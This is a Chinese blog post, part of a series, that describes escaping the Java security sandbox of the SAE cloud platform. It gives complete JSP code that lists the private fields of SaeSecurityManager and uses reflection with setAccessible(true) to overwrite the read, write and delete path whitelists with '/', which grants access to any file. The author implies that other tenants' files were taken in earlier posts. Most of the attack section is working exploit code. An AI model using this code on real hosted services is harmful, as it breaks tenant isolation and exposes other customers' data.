摘要 作者在文章《 SAE云服务安全沙箱绕过4(绕过文件权限防御) 》 提到过一个重要的类,是用来SAE做安全认证的,它叫做[com.sina.sae.security.SaeSecurityManager],这个类提供几个验证方法,本次BY PASS,作者又把目标放在这个类上。 正文 上一篇文章已经提到,如果想这个类作为沙盒安全认证的基础类,就必须继承java.lang.SecurityManager,并且当前运行环境中,可以查到当前的SecurityManager对象,以及具体的类名等。可以执行System 类的静态方法getSecurityManager( ),如果在运行Java 程序时使用-D java.security.manager 命令行选项指定了使用默认的安全管理器,或自己定义的安全管理器,则将返回该安全管理器。 探测sandbox环境 <%=System.getSecurityManager()%> 从页面返回信息中,可以看到这个类的地址和类名,确实是提示我们沙盒安全错误的那个类。这样就可以写段代码,用于查看类的属性。 下面看看这个类下面有什么属性: <%@page import="java.io.*,java.net.*,java.lang.reflect.*"%> <%=System.getSecurityManager() %><br> <% ClassLoader cl = Thread.currentThread().getContextClassLoader(); try { Class c = cl.loadClass("com.sina.sae.security.SaeSecurityManager"); %><%=c.toString()%><% Field[] f=c.getDeclaredFields(); %><%="----------------------------------"%><br><% for(int i=0;i <f.length;i++) { %><%=f[i].getType()+"|"+f[i].getName()%><br><%; } } catch (Exception e) { %><%=e%><% } %> 这段代码,可以遍历出一个对象的所有属性,包括私有的和public的。 打开页面后,看到执行结果: 我们看到了以下属性列表: String[] rwPath String[] readPath String[] deletePath BAN_LIST_STARTSWITH BAN_LIST_FULLNAME 这几个属性,通过英文单词的中文翻译,可以看到结果。 String[] rwPath — 这个是个路径列表,可能代表文件写权限的路径,如果猜得不错,很可能就是我web目录的路径。 String[] readPath — 这个是个路径列表,可能代表文件读取权限的路径,如果猜得不错,很可能就是我web目录的路径。 String[] deletePath — 这个是个路径列表,可能代表文件删除权限的路径,如果猜得不错,很可能就是我web目录的路径。 有这几个属性,就足够了说明问题了,SAE的相关代码,必然会根据这三个路径,去判断文件的读写权限。 提权 这个属性能不能改呢?如果它们是public的,就可以直接改掉了。 写代码修改这几个路径试试: <%@page import="java.io.*,java.net.*,java.lang.reflect.*"%> <% SecurityManager security = System.getSecurityManager(); try { Class c = System.getSecurityManager().getClass(); %><%=c.toString()%><% Field[] f=c.getDeclaredFields(); for(int i=0;i <f.length;i++) { %><%=f[i].getType()+"|"+f[i].getName()%><br><% try{ f[i].set(System.getSecurityManager(),new String[]{"/"}); }catch (Exception e) { %><%=e%><% } } %><%="----------------------------------"%><br><% for(int i=0;i <f.length;i++) { %><%=f[i].getType()+"|"+f[i].getName()%><br><%; } } catch (Exception e) { %><%=e%><% } %> <%=security.toString()%> 页面显示了 把这段重要的信息复制出来 java.lang.IllegalAccessException: Class org.apache. jsp .sm_jsp can not access a member of class com.sina.sae.security.SaeSecurityManager with modifiers "private"class [Ljava.lang.String;|readPath 这段错误的意思是,不能访问这个[private]的字段,这个字段不能直接改。但是这并不是无解的,如果当前的沙盒权限,刚好允许[suppressAccessChecks],是可以通过 setAccessible(true) 来强制修改类私有字段的。很巧,SAE确实允许这个权限,在第一次bypass时,我列了一部分权限列表,其中就包括这个权限。 所以,只要简略的修改代码,就可以实现强制修改这个属性: <%@page import="java.io.*,java.net.*,java.lang.reflect.*"%> <% SecurityManager security = System.getSecurityManager(); //ClassLoader cl = Thread.currentThread().getContextClassLoader(); try { Class c = System.getSecurityManager().getClass(); %><%=c.toString()%><% Field[] f=c.getDeclaredFields(); for(int i=0;i <f.length;i++) { f[i].setAccessible(true); %><%=f[i].getType()+"|"+f[i].getName()%><br><% try{ f[i].set(System.getSecurityManager(),new String[]{"/"}); }catch (Exception e) { %><%=e%><% } } %><%="----------------------------------"%><br><% for(int i=0;i <f.length;i++) { %><%=f[i].getType()+"|"+f[i].getName()%><br><%; } } catch (Exception e) { %><%=e%><% } %> <%=security.toString()%> HdhCmsTest2cto测试数据 这样就可以改了,这个页面,就是所谓的提权页面,只要访问了这个页面,当前app的权限就会提升,允许访问所有文件。 此之前还是先看看,不使用提权读取文件效果: 这个文件是不能读的,下面打开提权的JSP文件: 这个没有再次返回因为private所以不能修改的错误,至于后面的]Can not set static final java.util.Set field ],是因为]BAN_LIST_STARTSWITH],的字段类型不是String数组,这个字段我们反正也不去修改,所以无关紧要,重要的是我们把那三个允许当前app读、写、删除的文件白名单列表修改为[/]了,意味着可以读取删除修改任何文件。 下面再次访问这个读取文件的地址看看: 此时已突破权限,这次就不抓云上面的其他用户图了,每次都是这套流程,大家都懂得。 总结 作者已经不知道该总结啥了,多次bypass,可以看到开发人员对安全的理解,几乎为零,这样搞下去也没啥意思了,后面的BYPASS,作者只会记录次数,除非有很值得写一写的话题,否则也懒得发文了。 总之,权限列表中的权限允许,一定要仔细斟酌才可以开放。其他总结相关内容,见前文吧。
查看更多关于SAE云服务安全沙箱绕过5(强制修改class私有权限的详细内容...